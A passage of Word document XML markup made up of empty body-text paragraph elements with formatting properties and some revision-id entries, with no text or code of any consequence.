        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E0789" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E078A" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E078B" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E078C" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E078D" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E078E" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E078F" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E0790" w14:textId="77777777" w:rsidR="00C868EC" w:rsidRDefault="00C868EC">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="235"/>
        <w:ind w:left="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1E0791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8EC"/>
    <w:rsid w:val="00A35989"/>
    <w:rsid w:val="00C868EC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E9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